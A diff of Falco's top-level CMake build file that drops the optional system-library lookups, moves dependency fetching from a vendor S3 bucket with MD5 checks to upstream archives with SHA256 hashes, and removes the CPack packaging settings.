-#
-option(USE_BUNDLED_B64 "Enable building of the bundled b64" ${USE_BUNDLED_DEPS})

-if(NOT USE_BUNDLED_B64)
-	find_path(B64_INCLUDE NAMES b64/encode.h)
-	find_library(B64_LIB NAMES b64)
-	if(B64_INCLUDE AND B64_LIB)
-		message(STATUS "Found b64: include: ${B64_INCLUDE}, lib: ${B64_LIB}")
-	else()
-		message(FATAL_ERROR "Couldn't find system b64")
-	endif()
-else()
-	set(B64_SRC "${PROJECT_BINARY_DIR}/b64-prefix/src/b64")
-	message(STATUS "Using bundled b64 in '${B64_SRC}'")
-	set(B64_INCLUDE "${B64_SRC}/include")
-	set(B64_LIB "${B64_SRC}/src/libb64.a")
-	ExternalProject_Add(b64
-		URL "https://s3.amazonaws.com/download.draios.com/dependencies/libb64-1.2.src.zip"
-		URL_MD5 "a609809408327117e2c643bed91b76c5"
-		CONFIGURE_COMMAND ""
-		BUILD_COMMAND ${CMD_MAKE}
-		BUILD_IN_SOURCE 1
-		INSTALL_COMMAND "")
-endif()
+set(B64_SRC "${PROJECT_BINARY_DIR}/b64-prefix/src/b64")
+message(STATUS "Using bundled b64 in '${B64_SRC}'")
+set(B64_INCLUDE "${B64_SRC}/include")
+set(B64_LIB "${B64_SRC}/src/libb64.a")
+ExternalProject_Add(
+  b64
+  URL "https://github.com/libb64/libb64/archive/v1.2.1.zip"
+  URL_HASH "SHA256=665134c2b600098a7ebd3d00b6a866cb34909a6d48e0e37a0eda226a4ad2638a"
+  CONFIGURE_COMMAND ""
+  BUILD_COMMAND ${CMD_MAKE}
+  BUILD_IN_SOURCE 1
+  INSTALL_COMMAND "")

-#
-# yamlcpp
-#
-option(USE_BUNDLED_YAMLCPP "Enable building of the bundled yamlcpp" ${USE_BUNDLED_DEPS})
+# yaml-cpp
+include(yaml-cpp)

-if(NOT USE_BUNDLED_YAMLCPP)
-	find_path(YAMLCPP_INCLUDE_DIR NAMES yaml-cpp/yaml.h)
-	find_library(YAMLCPP_LIB NAMES yaml-cpp)
-	if(YAMLCPP_INCLUDE_DIR AND YAMLCPP_LIB)
-		message(STATUS "Found yamlcpp: include: ${YAMLCPP_INCLUDE_DIR}, lib: ${YAMLCPP_LIB}")
-	else()
-		message(FATAL_ERROR "Couldn't find system yamlcpp")
-	endif()
-else()
-	set(YAMLCPP_SRC "${PROJECT_BINARY_DIR}/yamlcpp-prefix/src/yamlcpp")
-	message(STATUS "Using bundled yaml-cpp in '${YAMLCPP_SRC}'")
-	set(YAMLCPP_LIB "${YAMLCPP_SRC}/libyaml-cpp.a")
-	set(YAMLCPP_INCLUDE_DIR "${YAMLCPP_SRC}/include")
-	ExternalProject_Add(yamlcpp
-		URL "https://s3.amazonaws.com/download.draios.com/dependencies/yaml-cpp-yaml-cpp-0.6.2.tar.gz"
-		URL_MD5 "5b943e9af0060d0811148b037449ef82"
-		BUILD_IN_SOURCE 1
-		INSTALL_COMMAND "")
-endif()
-
-#
 # OpenSSL
-#
-option(USE_BUNDLED_OPENSSL "Enable building of the bundled OpenSSL" ${USE_BUNDLED_DEPS})
+include(OpenSSL)

-if(NOT USE_BUNDLED_OPENSSL)
-	find_package(OpenSSL REQUIRED)
-	message(STATUS "Found OpenSSL: include: ${OPENSSL_INCLUDE_DIR}, lib: ${OPENSSL_LIBRARIES}")
-else()
-
-	set(OPENSSL_BUNDLE_DIR "${PROJECT_BINARY_DIR}/openssl-prefix/src/openssl")
-	set(OPENSSL_INSTALL_DIR "${OPENSSL_BUNDLE_DIR}/target")
-	set(OPENSSL_INCLUDE_DIR "${PROJECT_BINARY_DIR}/openssl-prefix/src/openssl/include")
-	set(OPENSSL_LIBRARY_SSL "${OPENSSL_INSTALL_DIR}/lib/libssl.a")
-	set(OPENSSL_LIBRARY_CRYPTO "${OPENSSL_INSTALL_DIR}/lib/libcrypto.a")
-
-	message(STATUS "Using bundled openssl in '${OPENSSL_BUNDLE_DIR}'")
-
-	ExternalProject_Add(openssl
-		# START CHANGE for CVE-2017-3735, CVE-2017-3731, CVE-2017-3737, CVE-2017-3738, CVE-2017-3736
-		URL "https://s3.amazonaws.com/download.draios.com/dependencies/openssl-1.0.2n.tar.gz"
-                URL_MD5 "13bdc1b1d1ff39b6fd42a255e74676a4"
-		# END CHANGE for CVE-2017-3735, CVE-2017-3731, CVE-2017-3737, CVE-2017-3738, CVE-2017-3736
-		CONFIGURE_COMMAND ./config shared --prefix=${OPENSSL_INSTALL_DIR}
-		BUILD_COMMAND ${CMD_MAKE}
-		BUILD_IN_SOURCE 1
-		INSTALL_COMMAND ${CMD_MAKE} install)
-endif()
-
-#
 # libcurl
-#
-option(USE_BUNDLED_CURL "Enable building of the bundled curl" ${USE_BUNDLED_DEPS})
+include(cURL)

-if(NOT USE_BUNDLED_CURL)
-	find_package(CURL REQUIRED)
-	message(STATUS "Found CURL: include: ${CURL_INCLUDE_DIR}, lib: ${CURL_LIBRARIES}")
-else()
-	set(CURL_BUNDLE_DIR "${PROJECT_BINARY_DIR}/curl-prefix/src/curl")
-	set(CURL_INCLUDE_DIR "${CURL_BUNDLE_DIR}/include/")
-	set(CURL_LIBRARIES "${CURL_BUNDLE_DIR}/lib/.libs/libcurl.a")
-
-	if(NOT USE_BUNDLED_OPENSSL)
-		set(CURL_SSL_OPTION "--with-ssl")
-	else()
-		set(CURL_SSL_OPTION "--with-ssl=${OPENSSL_INSTALL_DIR}")
-                message(STATUS "Using bundled curl in '${CURL_BUNDLE_DIR}'")
-                message(STATUS "Using SSL for curl in '${CURL_SSL_OPTION}'")
-	endif()
-
-	ExternalProject_Add(curl
-		DEPENDS openssl
-		# START CHANGE for CVE-2017-8816, CVE-2017-8817, CVE-2017-8818, CVE-2018-1000007
-		URL "https://s3.amazonaws.com/download.draios.com/dependencies/curl-7.61.0.tar.bz2"
-		URL_MD5 "31d0a9f48dc796a7db351898a1e5058a"
-		# END CHANGE for CVE-2017-8816, CVE-2017-8817, CVE-2017-8818, CVE-2018-1000007
-		CONFIGURE_COMMAND ./configure ${CURL_SSL_OPTION} --disable-shared --enable-optimize --disable-curldebug --disable-rt --enable-http --disable-ftp --disable-file --disable-ldap --disable-ldaps --disable-rtsp --disable-telnet --disable-tftp --disable-pop3 --disable-imap --disable-smb --disable-smtp --disable-gopher --disable-sspi --disable-ntlm-wb --disable-tls-srp --without-winssl --without-darwinssl --without-polarssl --without-cyassl --without-nss --without-axtls --without-ca-path --without-ca-bundle --without-libmetalink --without-librtmp --without-winidn --without-libidn2 --without-libpsl --without-nghttp2 --without-libssh2 --disable-threaded-resolver --without-brotli
-		BUILD_COMMAND ${CMD_MAKE}
-		BUILD_IN_SOURCE 1
-		INSTALL_COMMAND "")
-endif()
-
-#
 # LuaJIT
-#
-option(USE_BUNDLED_LUAJIT "Enable building of the bundled LuaJIT" ${USE_BUNDLED_DEPS})
+set(LUAJIT_SRC "${PROJECT_BINARY_DIR}/luajit-prefix/src/luajit/src")
+message(STATUS "Using bundled LuaJIT in '${LUAJIT_SRC}'")
+set(LUAJIT_INCLUDE "${LUAJIT_SRC}")
+set(LUAJIT_LIB "${LUAJIT_SRC}/libluajit.a")
+ExternalProject_Add(
+  luajit
+  URL "https://github.com/LuaJIT/LuaJIT/archive/v2.0.3.tar.gz"
+  URL_HASH "SHA256=8da3d984495a11ba1bce9a833ba60e18b532ca0641e7d90d97fafe85ff014baa"
+  CONFIGURE_COMMAND ""
+  BUILD_COMMAND ${CMD_MAKE}
+  BUILD_IN_SOURCE 1
+  INSTALL_COMMAND "")

-if(NOT USE_BUNDLED_LUAJIT)
-	find_path(LUAJIT_INCLUDE luajit.h PATH_SUFFIXES luajit-2.0 luajit)
-	find_library(LUAJIT_LIB NAMES luajit luajit-5.1)
-	if(LUAJIT_INCLUDE AND LUAJIT_LIB)
-		message(STATUS "Found LuaJIT: include: ${LUAJIT_INCLUDE}, lib: ${LUAJIT_LIB}")
-	else()
-		# alternatively try stock Lua
-		find_package(Lua51)
-		set(LUAJIT_LIB ${LUA_LIBRARY})
-		set(LUAJIT_INCLUDE ${LUA_INCLUDE_DIR})
-
-		if(NOT ${LUA51_FOUND})
-			message(FATAL_ERROR "Couldn't find system LuaJIT or Lua")
-		endif()
-	endif()
-else()
-	set(LUAJIT_SRC "${PROJECT_BINARY_DIR}/luajit-prefix/src/luajit/src")
-	message(STATUS "Using bundled LuaJIT in '${LUAJIT_SRC}'")
-	set(LUAJIT_INCLUDE "${LUAJIT_SRC}")
-	set(LUAJIT_LIB "${LUAJIT_SRC}/libluajit.a")
-	ExternalProject_Add(luajit
-		URL "https://s3.amazonaws.com/download.draios.com/dependencies/LuaJIT-2.0.3.tar.gz"
-		URL_MD5 "f14e9104be513913810cd59c8c658dc0"
-		CONFIGURE_COMMAND ""
-		BUILD_COMMAND ${CMD_MAKE}
-		BUILD_IN_SOURCE 1
-		INSTALL_COMMAND "")
-endif()
-
-#
 # Lpeg
-#
-option(USE_BUNDLED_LPEG "Enable building of the bundled lpeg" ${USE_BUNDLED_DEPS})
+set(LPEG_SRC "${PROJECT_BINARY_DIR}/lpeg-prefix/src/lpeg")
+set(LPEG_LIB "${PROJECT_BINARY_DIR}/lpeg-prefix/src/lpeg/build/lpeg.a")
+message(STATUS "Using bundled lpeg in '${LPEG_SRC}'")
+set(LPEG_DEPENDENCIES "")
+list(APPEND LPEG_DEPENDENCIES "luajit")
+ExternalProject_Add(
+  lpeg
+  DEPENDS ${LPEG_DEPENDENCIES}
+  URL "http://www.inf.puc-rio.br/~roberto/lpeg/lpeg-1.0.2.tar.gz"
+  URL_HASH "SHA256=48d66576051b6c78388faad09b70493093264588fcd0f258ddaab1cdd4a15ffe"
+  BUILD_COMMAND LUA_INCLUDE=${LUAJIT_INCLUDE} "${PROJECT_SOURCE_DIR}/scripts/build-lpeg.sh" "${LPEG_SRC}/build"
+  BUILD_IN_SOURCE 1
+  CONFIGURE_COMMAND ""
+  INSTALL_COMMAND "")

-if(NOT USE_BUNDLED_LPEG)
-	find_library(LPEG_LIB NAMES lpeg.a)
-	if(LPEG_LIB)
-		message(STATUS "Found lpeg: lib: ${LPEG_LIB}")
-	else()
-		message(FATAL_ERROR "Couldn't find system lpeg")
-	endif()
+# libyaml
+find_library(LIBYAML_LIB NAMES libyaml.so)
+if(LIBYAML_LIB)
+  message(STATUS "Found libyaml: lib: ${LIBYAML_LIB}")
 else()
-	set(LPEG_SRC "${PROJECT_BINARY_DIR}/lpeg-prefix/src/lpeg")
-	set(LPEG_LIB "${PROJECT_BINARY_DIR}/lpeg-prefix/src/lpeg/build/lpeg.a")
-	message(STATUS "Using bundled lpeg in '${LPEG_SRC}'")
-	set(LPEG_DEPENDENCIES "")
-	if(USE_BUNDLED_LUAJIT)
-		list(APPEND LPEG_DEPENDENCIES "luajit")
-	endif()
-	ExternalProject_Add(lpeg
-		DEPENDS ${LPEG_DEPENDENCIES}
-		URL "https://s3.amazonaws.com/download.draios.com/dependencies/lpeg-1.0.0.tar.gz"
-		URL_MD5 "0aec64ccd13996202ad0c099e2877ece"
-		BUILD_COMMAND LUA_INCLUDE=${LUAJIT_INCLUDE} "${PROJECT_SOURCE_DIR}/scripts/build-lpeg.sh" "${LPEG_SRC}/build"
-		BUILD_IN_SOURCE 1
-		CONFIGURE_COMMAND ""
-		INSTALL_COMMAND "")
+  message(FATAL_ERROR "Couldn't find system libyaml")
 endif()

-#
-# Libyaml
-#
-option(USE_BUNDLED_LIBYAML "Enable building of the bundled libyaml" ${USE_BUNDLED_DEPS})
-if(NOT USE_BUNDLED_LIBYAML)
-	# Note: to distinguish libyaml.a and yaml.a we specify a full
-	# file name here, so you'll have to arrange for static
-	# libraries being available.
-	find_library(LIBYAML_LIB NAMES libyaml.a)
-	if(LIBYAML_LIB)
-		message(STATUS "Found libyaml: lib: ${LIBYAML_LIB}")
-	else()
-		message(FATAL_ERROR "Couldn't find system libyaml")
-	endif()
-else()
-	find_path(AUTORECONF_BIN NAMES autoreconf)
-	if(AUTORECONF_BIN)
-		message(STATUS "Found autoreconf: ${AUTORECONF_BIN}")
-	else()
-		message(FATAL_ERROR "Couldn't find system autoreconf. Please install autoreconf before continuing or use system libyaml")
-	endif()
-
-	set(LIBYAML_SRC "${PROJECT_BINARY_DIR}/libyaml-prefix/src/libyaml/src")
-	set(LIBYAML_INCLUDE "${PROJECT_BINARY_DIR}/libyaml-prefix/src/libyaml/include")
-	set(LIBYAML_LIB "${LIBYAML_SRC}/.libs/libyaml.a")
-	message(STATUS "Using bundled libyaml in '${LIBYAML_SRC}'")
-	ExternalProject_Add(libyaml
-		URL "https://s3.amazonaws.com/download.draios.com/dependencies/libyaml-0.1.4.tar.gz"
-		URL_MD5 "4a4bced818da0b9ae7fc8ebc690792a7"
-		BUILD_COMMAND ${CMD_MAKE}
-		BUILD_IN_SOURCE 1
-		CONFIGURE_COMMAND ./bootstrap && ./configure
-		INSTALL_COMMAND "")
-endif()
-
-#
 # lyaml
-#
-option(USE_BUNDLED_LYAML "Enable building of the bundled lyaml" ${USE_BUNDLED_DEPS})
-if(NOT USE_BUNDLED_LYAML)
-	# Note: to distinguish libyaml.a and yaml.a we specify a full
-	# file name here, so you'll have to arrange for static
-	# libraries being available.
-	find_library(LYAML_LIB NAMES yaml.a)
-	if(LYAML_LIB)
-		message(STATUS "Found lyaml: lib: ${LYAML_LIB}")
-	else()
-		message(FATAL_ERROR "Couldn't find system lyaml")
-	endif()
-else()
-	set(LYAML_SRC "${PROJECT_BINARY_DIR}/lyaml-prefix/src/lyaml/ext/yaml")
-	set(LYAML_LIB "${LYAML_SRC}/.libs/yaml.a")
-	message(STATUS "Using bundled lyaml in '${LYAML_SRC}'")
-	set(LYAML_DEPENDENCIES "")
-	if(USE_BUNDLED_LUAJIT)
-		list(APPEND LYAML_DEPENDENCIES "luajit")
-	endif()
-	if(USE_BUNDLED_LIBYAML)
-		list(APPEND LYAML_DEPENDENCIES "libyaml")
-	endif()
+set(LYAML_SRC "${PROJECT_BINARY_DIR}/lyaml-prefix/src/lyaml/ext/yaml")
+set(LYAML_LIB "${LYAML_SRC}/.libs/yaml.a")
+message(STATUS "Using bundled lyaml in '${LYAML_SRC}'")
+set(LYAML_DEPENDENCIES "")
+list(APPEND LYAML_DEPENDENCIES "luajit")
+ExternalProject_Add(
+  lyaml
+  DEPENDS ${LYAML_DEPENDENCIES}
+  URL "https://github.com/gvvaughan/lyaml/archive/release-v6.0.tar.gz"
+  URL_HASH "SHA256=9d7cf74d776999ff6f758c569d5202ff5da1f303c6f4229d3b41f71cd3a3e7a7"
+  BUILD_COMMAND ${CMD_MAKE}
+  BUILD_IN_SOURCE 1
+  CONFIGURE_COMMAND ./configure --enable-static LIBS=-lyaml LUA_INCLUDE=-I${LUAJIT_INCLUDE} LUA=${LUAJIT_SRC}/luajit
+  INSTALL_COMMAND sh -c
+                  "cp -R ${PROJECT_BINARY_DIR}/lyaml-prefix/src/lyaml/lib/* ${PROJECT_SOURCE_DIR}/userspace/engine/lua")

-	ExternalProject_Add(lyaml
-		DEPENDS ${LYAML_DEPENDENCIES}
-		URL "https://s3.amazonaws.com/download.draios.com/dependencies/lyaml-release-v6.0.tar.gz"
-		URL_MD5 "dc3494689a0dce7cf44e7a99c72b1f30"
-		BUILD_COMMAND ${CMD_MAKE}
-		BUILD_IN_SOURCE 1
-		CONFIGURE_COMMAND ./configure --enable-static LIBS=-L${LIBYAML_SRC}/.libs CFLAGS=-I${LIBYAML_INCLUDE} CPPFLAGS=-I${LIBYAML_INCLUDE} LUA_INCLUDE=-I${LUAJIT_INCLUDE} LUA=${LUAJIT_SRC}/luajit
-		INSTALL_COMMAND sh -c "cp -R ${PROJECT_BINARY_DIR}/lyaml-prefix/src/lyaml/lib/* ${PROJECT_SOURCE_DIR}/userspace/engine/lua")
-endif()
+# One TBB
+set(TBB_SRC "${PROJECT_BINARY_DIR}/tbb-prefix/src/tbb")

-option(USE_BUNDLED_TBB "Enable building of the bundled tbb" ${USE_BUNDLED_DEPS})
-if(NOT USE_BUNDLED_TBB)
-	find_path(TBB_INCLUDE_DIR tbb.h PATH_SUFFIXES tbb)
-	find_library(TBB_LIB NAMES tbb)
-	if(TBB_INCLUDE_DIR AND TBB_LIB)
-		message(STATUS "Found tbb: include: ${TBB_INCLUDE_DIR}, lib: ${TBB_LIB}")
-	else()
-		message(FATAL_ERROR "Couldn't find system tbb")
-	endif()
-else()
-	set(TBB_SRC "${PROJECT_BINARY_DIR}/tbb-prefix/src/tbb")
+message(STATUS "Using bundled tbb in '${TBB_SRC}'")

-	message(STATUS "Using bundled tbb in '${TBB_SRC}'")
+set(TBB_INCLUDE_DIR "${TBB_SRC}/include/")
+set(TBB_LIB "${TBB_SRC}/build/lib_release/libtbb.a")
+ExternalProject_Add(
+  tbb
+  URL "https://github.com/oneapi-src/oneTBB/archive/2018_U5.tar.gz"
+  URL_HASH "SHA256=b8dbab5aea2b70cf07844f86fa413e549e099aa3205b6a04059ca92ead93a372"
+  CONFIGURE_COMMAND ""
+  BUILD_COMMAND ${CMD_MAKE} tbb_build_dir=${TBB_SRC}/build tbb_build_prefix=lib extra_inc=big_iron.inc
+  BUILD_IN_SOURCE 1
+  BUILD_BYPRODUCTS ${TBB_LIB}
+  INSTALL_COMMAND "")

-	set(TBB_INCLUDE_DIR "${TBB_SRC}/include/")
-	set(TBB_LIB "${TBB_SRC}/build/lib_release/libtbb.a")
-	ExternalProject_Add(tbb
-		URL "https://s3.amazonaws.com/download.draios.com/dependencies/tbb-2018_U5.tar.gz"
-		URL_MD5 "ff3ae09f8c23892fbc3008c39f78288f"
-		CONFIGURE_COMMAND ""
-		BUILD_COMMAND ${CMD_MAKE} tbb_build_dir=${TBB_SRC}/build tbb_build_prefix=lib extra_inc=big_iron.inc
-		BUILD_IN_SOURCE 1
-		BUILD_BYPRODUCTS ${TBB_LIB}
-		INSTALL_COMMAND "")
-endif()
-
-#
 # civetweb
-#
-option(USE_BUNDLED_CIVETWEB "Enable building of the bundled civetweb" ${USE_BUNDLED_DEPS})
+set(CIVETWEB_SRC "${PROJECT_BINARY_DIR}/civetweb-prefix/src/civetweb/")
+set(CIVETWEB_LIB "${CIVETWEB_SRC}/install/lib/libcivetweb.a")
+set(CIVETWEB_INCLUDE_DIR "${CIVETWEB_SRC}/install/include")
+message(STATUS "Using bundled civetweb in '${CIVETWEB_SRC}'")
+ExternalProject_Add(
+  civetweb
+  URL "https://github.com/civetweb/civetweb/archive/v1.11.tar.gz"
+  URL_HASH "SHA256=de7d5e7a2d9551d325898c71e41d437d5f7b51e754b242af897f7be96e713a42"
+  CONFIGURE_COMMAND ${CMAKE_COMMAND} -E make_directory ${CIVETWEB_SRC}/install/lib
+  COMMAND ${CMAKE_COMMAND} -E make_directory ${CIVETWEB_SRC}/install/include
+  BUILD_IN_SOURCE 1
+  BUILD_COMMAND ${CMD_MAKE} COPT="-DNO_FILES" WITH_CPP=1
+  INSTALL_COMMAND ${CMD_MAKE} COPT="-DNO_FILES" install-lib install-headers PREFIX=${CIVETWEB_SRC}/install "WITH_CPP=1")

-if(NOT USE_BUNDLED_CIVETWEB)
-	find_library(CIVETWEB_LIB NAMES civetweb)
-	if(CIVETWEB_LIB)
-		message(STATUS "Found civetweb: lib: ${CIVETWEB_LIB}")
-	else()
-		message(FATAL_ERROR "Couldn't find system civetweb")
-	endif()
-else()
-	set(CIVETWEB_SRC "${PROJECT_BINARY_DIR}/civetweb-prefix/src/civetweb/")
-	set(CIVETWEB_LIB "${CIVETWEB_SRC}/install/lib/libcivetweb.a")
-	set(CIVETWEB_INCLUDE_DIR "${CIVETWEB_SRC}/install/include")
-	message(STATUS "Using bundled civetweb in '${CIVETWEB_SRC}'")
-	set(CIVETWEB_DEPENDENCIES "")
-	if(USE_BUNDLED_OPENSSL)
-	 	list(APPEND CIVETWEB_DEPENDENCIES "openssl")
-	endif()
-	ExternalProject_Add(civetweb
-		DEPENDS ${CIVETWEB_DEPENDENCIES}
-		URL "https://s3.amazonaws.com/download.draios.com/dependencies/civetweb-1.11.tar.gz"
-                URL_MD5 "b6d2175650a27924bccb747cbe084cd4"
-		CONFIGURE_COMMAND ${CMAKE_COMMAND} -E make_directory ${CIVETWEB_SRC}/install/lib
-		          COMMAND ${CMAKE_COMMAND} -E make_directory ${CIVETWEB_SRC}/install/include
-                BUILD_IN_SOURCE 1
-                BUILD_COMMAND ${CMD_MAKE} COPT="-DNO_FILES" WITH_CPP=1
-		INSTALL_COMMAND ${CMD_MAKE} install-lib install-headers PREFIX=${CIVETWEB_SRC}/install WITH_CPP=1)
-endif()
+#string-view-lite
+include(DownloadStringViewLite)

-option(USE_BUNDLED_CARES "Enable building of the bundled c-ares" ${USE_BUNDLED_DEPS})
-if(NOT USE_BUNDLED_CARES)
-	find_path(CARES_INCLUDE NAMES cares/ares.h)
-	find_library(CARES_LIB NAMES libcares.a)
-	if(CARES_INCLUDE AND CARES_LIB)
-		message(STATUS "Found c-ares: include: ${CARES_INCLUDE}, lib: ${CARES_LIB}")
-	else()
-		message(FATAL_ERROR "Couldn't find system c-ares")
-	endif()
-else()
-	set(CARES_SRC "${PROJECT_BINARY_DIR}/c-ares-prefix/src/c-ares")
-	message(STATUS "Using bundled c-ares in '${CARES_SRC}'")
-	set(CARES_INCLUDE "${CARES_SRC}/target/include")
-	set(CARES_LIB "${CARES_SRC}/target/lib/libcares.a")
-	ExternalProject_Add(c-ares
-		URL "https://download.sysdig.com/dependencies/c-ares-1.13.0.tar.gz"
-		URL_MD5 "d2e010b43537794d8bedfb562ae6bba2"
-		CONFIGURE_COMMAND ./configure --prefix=${CARES_SRC}/target
-		BUILD_COMMAND ${CMD_MAKE}
-		BUILD_IN_SOURCE 1
-		BUILD_BYPRODUCTS ${CARES_INCLUDE} ${CARES_LIB}
-		INSTALL_COMMAND ${CMD_MAKE} install)
-endif()
+# gRPC
+include(gRPC)

-option(USE_BUNDLED_PROTOBUF "Enable building of the bundled protobuf" ${USE_BUNDLED_DEPS})
-if(NOT USE_BUNDLED_PROTOBUF)
-	find_program(PROTOC NAMES protoc)
-	find_path(PROTOBUF_INCLUDE NAMES google/protobuf/message.h)
-	find_library(PROTOBUF_LIB NAMES libprotobuf.a)
-	if(PROTOC AND PROTOBUF_INCLUDE AND PROTOBUF_LIB)
-		message(STATUS "Found protobuf: compiler: ${PROTOC}, include: ${PROTOBUF_INCLUDE}, lib: ${PROTOBUF_LIB}")
-	else()
-		message(FATAL_ERROR "Couldn't find system protobuf")
-	endif()
-else()
-	set(PROTOBUF_SRC "${PROJECT_BINARY_DIR}/protobuf-prefix/src/protobuf")
-	message(STATUS "Using bundled protobuf in '${PROTOBUF_SRC}'")
-	set(PROTOC "${PROTOBUF_SRC}/target/bin/protoc")
-	set(PROTOBUF_INCLUDE "${PROTOBUF_SRC}/target/include")
-	set(PROTOBUF_LIB "${PROTOBUF_SRC}/target/lib/libprotobuf.a")
-	ExternalProject_Add(protobuf
-		DEPENDS openssl zlib
-		URL "https://github.com/google/protobuf/releases/download/v3.5.0/protobuf-cpp-3.5.0.tar.gz"
-		URL_MD5 "e4ba8284a407712168593e79e6555eb2"
-		# TODO what if using system zlib?
-		CONFIGURE_COMMAND /usr/bin/env CPPFLAGS=-I${ZLIB_INCLUDE} LDFLAGS=-L${ZLIB_SRC} ./configure --with-zlib --prefix=${PROTOBUF_SRC}/target
-		BUILD_COMMAND ${CMD_MAKE}
-		BUILD_IN_SOURCE 1
-		BUILD_BYPRODUCTS ${PROTOC} ${PROTOBUF_INCLUDE} ${PROTOBUF_LIB}
-		# TODO s390x support
-		INSTALL_COMMAND make install)
-endif()
+# sysdig
+include(sysdig)

-option(USE_BUNDLED_GRPC "Enable building of the bundled grpc" ${USE_BUNDLED_DEPS})
-if(NOT USE_BUNDLED_GRPC)
-	find_path(GRPC_INCLUDE grpc++/impl/codegen/rpc_method.h)
-	find_library(GRPC_LIB NAMES libgrpc_unsecure.a)
-	find_library(GRPCPP_LIB NAMES libgrpc++_unsecure.a)
-	if(GRPC_INCLUDE AND GRPC_LIB AND GRPCPP_LIB)
-		message(STATUS "Found grpc: include: ${GRPC_INCLUDE}, C lib: ${GRPC_LIB}, C++ lib: ${GRPC_PP_LIB}")
-	else()
-		message(FATAL_ERROR "Couldn't find system grpc")
-	endif()
-	find_program(GRPC_CPP_PLUGIN grpc_cpp_plugin)
-	if(NOT GRPC_CPP_PLUGIN)
-		message(FATAL_ERROR "System grpc_cpp_plugin not found")
-	endif()
-else()
-	set(GRPC_SRC "${PROJECT_BINARY_DIR}/grpc-prefix/src/grpc")
-	message(STATUS "Using bundled grpc in '${GRPC_SRC}'")
-	set(GRPC_INCLUDE "${GRPC_SRC}/include")
-	set(GRPC_LIB "${GRPC_SRC}/libs/opt/libgrpc_unsecure.a")
-	set(GRPCPP_LIB "${GRPC_SRC}/libs/opt/libgrpc++_unsecure.a")
-	set(GRPC_CPP_PLUGIN "${GRPC_SRC}/bins/opt/grpc_cpp_plugin")
+# Installation
+install(FILES falco.yaml DESTINATION "${FALCO_ETC_DIR}")

-	get_filename_component(PROTOC_DIR ${PROTOC} DIRECTORY)
-
-	ExternalProject_Add(grpc
-		DEPENDS protobuf zlib c-ares
-		URL "https://s3.amazonaws.com/download.draios.com/dependencies/grpc-1.8.1.tar.gz"
-		URL_MD5 "2fc42c182a0ed1b48ad77397f76bb3bc"
-		CONFIGURE_COMMAND ""
-		# TODO what if using system openssl, protobuf or cares?
-		BUILD_COMMAND sh -c "CFLAGS=-Wno-implicit-fallthrough CXXFLAGS=\"-Wno-ignored-qualifiers -Wno-stringop-truncation\" HAS_SYSTEM_ZLIB=false LDFLAGS=-static PATH=${PROTOC_DIR}:$ENV{PATH} PKG_CONFIG_PATH=${OPENSSL_BUNDLE_DIR}:${PROTOBUF_SRC}:${CARES_SRC} make grpc_cpp_plugin static_cxx static_c"
-		BUILD_IN_SOURCE 1
-		BUILD_BYPRODUCTS ${GRPC_LIB} ${GRPCPP_LIB}
-		# TODO s390x support
-		# TODO what if using system zlib
-		PATCH_COMMAND rm -rf third_party/zlib && ln -s ${ZLIB_SRC} third_party/zlib && curl -L https://download.sysdig.com/dependencies/grpc-1.1.4-Makefile.patch | patch
-		INSTALL_COMMAND "")
-endif()
-
-
-install(FILES falco.yaml
-	DESTINATION "${FALCO_ETC_DIR}")
+# Coverage
+include(Coverage)

+# Tests
 add_subdirectory(test)
+
+# Rules
 add_subdirectory(rules)
+
+# Dockerfiles
 add_subdirectory(docker)

-if(CMAKE_SYSTEM_NAME MATCHES "Linux")
-	add_subdirectory("${SYSDIG_DIR}/driver" "${PROJECT_BINARY_DIR}/driver")
-	include(FindMakedev)
-endif()
-add_subdirectory("${SYSDIG_DIR}/userspace/libscap" "${PROJECT_BINARY_DIR}/userspace/libscap")
-add_subdirectory("${SYSDIG_DIR}/userspace/libsinsp" "${PROJECT_BINARY_DIR}/userspace/libsinsp")
+# Clang format
+# add_custom_target(format COMMAND clang-format --style=file -i $<TARGET_PROPERTY:falco,SOURCES> COMMENT "Formatting ..." VERBATIM)

+# Shared build variables
 set(FALCO_SINSP_LIBRARY sinsp)
 set(FALCO_SHARE_DIR share/falco)
 set(FALCO_ABSOLUTE_SHARE_DIR "${CMAKE_INSTALL_PREFIX}/${FALCO_SHARE_DIR}")
 set(FALCO_BIN_DIR bin)
+
 add_subdirectory(scripts)
 add_subdirectory(userspace/engine)
 add_subdirectory(userspace/falco)
 add_subdirectory(tests)

-set(CPACK_PACKAGE_NAME "${PACKAGE_NAME}")
-set(CPACK_PACKAGE_VENDOR "Sysdig Inc.")
-set(CPACK_PACKAGE_CONTACT "opensource@sysdig.com")
-set(CPACK_PACKAGE_DESCRIPTION_SUMMARY "Falco - Container Native Runtime Security")
-set(CPACK_PACKAGE_DESCRIPTION_FILE "${PROJECT_SOURCE_DIR}/scripts/description.txt")
-set(CPACK_PACKAGE_VERSION "${FALCO_VERSION}")
-set(CPACK_PACKAGE_FILE_NAME "${CPACK_PACKAGE_NAME}-${CPACK_PACKAGE_VERSION}-${CMAKE_SYSTEM_PROCESSOR}")
-set(CPACK_PROJECT_CONFIG_FILE "${PROJECT_SOURCE_DIR}/CMakeCPackOptions.cmake")
-set(CPACK_STRIP_FILES "ON")
-set(CPACK_PACKAGE_RELOCATABLE "OFF")
-
-set(CPACK_GENERATOR DEB RPM TGZ)
-
-set(CPACK_DEBIAN_PACKAGE_SECTION "utils")
-set(CPACK_DEBIAN_PACKAGE_ARCHITECTURE "amd64")
-set(CPACK_DEBIAN_PACKAGE_HOMEPAGE "https://www.falco.org")
-set(CPACK_DEBIAN_PACKAGE_DEPENDS "dkms (>= 2.1.0.0)")
-set(CPACK_DEBIAN_PACKAGE_CONTROL_EXTRA "${CMAKE_BINARY_DIR}/scripts/debian/postinst;${CMAKE_BINARY_DIR}/scripts/debian/prerm;${PROJECT_SOURCE_DIR}/scripts/debian/postrm;${PROJECT_SOURCE_DIR}/cpack/debian/conffiles")
-
-set(CPACK_RPM_PACKAGE_LICENSE "Apache v2.0")
-set(CPACK_RPM_PACKAGE_URL "https://www.falco.org")
-set(CPACK_RPM_PACKAGE_REQUIRES "dkms, gcc, make, kernel-devel, perl")
-set(CPACK_RPM_POST_INSTALL_SCRIPT_FILE "${PROJECT_SOURCE_DIR}/scripts/rpm/postinstall")
-set(CPACK_RPM_PRE_UNINSTALL_SCRIPT_FILE "${PROJECT_SOURCE_DIR}/scripts/rpm/preuninstall")
-set(CPACK_RPM_POST_UNINSTALL_SCRIPT_FILE "${PROJECT_SOURCE_DIR}/scripts/rpm/postuninstall")
